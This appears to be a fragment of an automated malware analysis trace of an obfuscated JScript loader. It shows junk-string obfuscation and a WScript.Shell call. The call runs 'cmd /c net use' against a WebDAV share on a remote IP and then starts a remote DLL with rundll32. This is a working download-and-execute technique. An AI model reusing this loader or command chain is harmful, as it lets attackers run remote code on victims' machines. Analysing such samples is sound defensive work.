                                                                                                                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                                62
                                                                                                                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                                  63
                                                                                                                                                  Function ( '' + flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawyw...
                                                                                                                                                  • Function("return this") ➔ function anonymous()
                                                                                                                                                  • () ➔
                                                                                                                                                  • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                                  • run("cmd /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\18916...",0,false) ➔ 0
                                                                                                                                                  Reset < >